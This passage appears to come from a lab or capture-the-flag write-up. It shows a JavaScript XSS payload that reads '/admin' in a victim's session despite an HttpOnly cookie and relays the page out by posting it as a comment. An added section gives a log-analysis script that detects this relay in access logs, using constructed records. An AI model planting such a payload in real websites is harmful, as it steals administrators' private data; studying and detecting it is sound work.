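The cookie is now HttpOnly, but we only care about the contents of `/admin`, not the cookie itself. HttpOnly only stops script from reading the cookie; the browser still sends it with a same-origin `fetch`. So we can reuse the payload from `Subdomain Takeover - Easy`, without doing the subdomain takeover.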
```
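// Read /admin in the victim's session (the HttpOnly cookie is sent automatically).
fetch('/admin').then(r => r.text()).then(d => {
  let data = new URLSearchParams();
  data.append('name', 'admin page');
  data.append('comment', d);
  // Post the page body back as a comment so it can be read afterwards.
  fetch('/new-comment', {
    method: 'POST',
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: data,
  });
})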
```
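A detection-side view of the payload above, as an added example that is not part of the original writeup: the script makes one session read `/admin` and then immediately POST a comment roughly as large as that page, which shows up in access logs. The log record fields, the thresholds and the sample records are constructed assumptions.

```javascript
// Constructed access-log records (not from the original page).
// Assumed fields: session id, ts in seconds, method, path, request/response body sizes.
const sampleLog = [
  { session: 'u1',  ts: 100,  method: 'POST', path: '/new-comment', reqBytes: 48,   respBytes: 20 },
  { session: 'adm', ts: 201,  method: 'GET',  path: '/admin',       reqBytes: 0,    respBytes: 4200 },
  { session: 'adm', ts: 201,  method: 'POST', path: '/new-comment', reqBytes: 5900, respBytes: 20 },
  { session: 'adm', ts: 900,  method: 'GET',  path: '/admin',       reqBytes: 0,    respBytes: 4200 },
  { session: 'adm', ts: 1500, method: 'POST', path: '/new-comment', reqBytes: 60,   respBytes: 20 },
];

// Flag a session that reads /admin and, within windowSec, posts a comment whose
// body is at least minRatio of the /admin response size. URL-encoding inflates
// the relayed page, so the POST is normally larger than the page it carries.
function findAdminPageRelay(log, { windowSec = 5, minRatio = 0.8 } = {}) {
  const lastAdminRead = new Map(); // session -> most recent GET /admin record
  const alerts = [];
  // Stable sort keeps same-second records in their logged order.
  for (const rec of [...log].sort((a, b) => a.ts - b.ts)) {
    if (rec.method === 'GET' && rec.path === '/admin') {
      lastAdminRead.set(rec.session, rec);
    } else if (rec.method === 'POST' && rec.path === '/new-comment') {
      const read = lastAdminRead.get(rec.session);
      if (!read) continue; // this session never loaded /admin
      const closeInTime = rec.ts - read.ts <= windowSec;
      const bigEnough = rec.reqBytes >= read.respBytes * minRatio;
      if (closeInTime && bigEnough) {
        alerts.push({ session: rec.session, readAt: read.ts,
                      postAt: rec.ts, postBytes: rec.reqBytes });
      }
    }
  }
  return alerts;
}

console.log(findAdminPageRelay(sampleLog));
```

Only the 5900-byte POST one second-window after the `/admin` read is flagged; the short comment from the same session ten minutes later is not.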